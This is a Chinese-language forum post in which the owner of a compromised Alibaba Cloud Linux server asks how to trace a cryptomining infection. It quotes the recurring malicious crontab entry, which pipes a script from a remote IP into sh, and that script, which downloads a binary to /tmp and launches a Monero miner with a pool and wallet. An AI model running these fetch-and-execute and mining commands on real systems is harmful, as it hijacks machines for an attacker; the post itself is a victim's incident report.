请教大神,服务器被挖矿程序入侵如何排插
我用的阿里云的服务器,linux系统,有时CPU占用100%,这个时候根本连接不上服务器,只能通过强制重启的方式后才能使用,所以很难看到哪个进程占了资源,但至少我自己并没长时间跑什么程序。同时,非root用户下经常在crontab里发现类似如下的任务,删了又有
*/1 * * * * curl 107.179.126.28/_x2|sh
登陆这个网址有如下代码段
AGENT_FILE='/tmp/.X11_86'
if [ ! -f $AGENT_FILE ]; then
curl 107.179.126.28/_x3 > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x > /dev/null 2>&1 &
fi
问过阿里的客服,说是被入侵了,但并没有告诉如何排插
我自己搜索了下,和有的被挖矿程序入侵的比较类似但是有不同,不同点如下
1、/usr/local/etc 里面没有东西
2、没有yam文件
3、没有/root/.ssh/KHK75NEOiq
4、/opt/minerd 和 /opt/KHK75NEOiq33 也没有
5、没有lady服务
所以挺奇怪这个crontab里的数据哪里来的,看crontrab日志也看不出个名堂,我现在唯一的办法是把crontab任务停了,但是这影响我的使用了,所以还望大家指教。
下面是另外个哥们儿的排查方法,我和他唯一相同的就是crontab里有数据
http://m.blog.csdn.net/article/details?id=51971121